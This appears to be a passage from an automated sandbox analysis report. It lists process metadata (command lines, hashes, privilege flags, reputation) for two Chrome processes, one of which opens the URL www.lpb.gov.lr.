                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 --field-trial-handle=2020,i,1401660104828824542,16529630401090676831,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                        Imagebase:0x7ff6c4390000
                                                                                                                        File size:3'242'272 bytes
                                                                                                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:low
                                                                                                                        Has exited:false

                                                                                                                        Target ID:9
                                                                                                                        Start time:08:54:39
                                                                                                                        Start date:10/01/2025
                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://www.lpb.gov.lr"
                                                                                                                        Imagebase:0x7ff6c4390000
                                                                                                                        File size:3'242'272 bytes
                                                                                                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:low
                                                                                                                        Has exited:true

                                                                                                                        No disassembly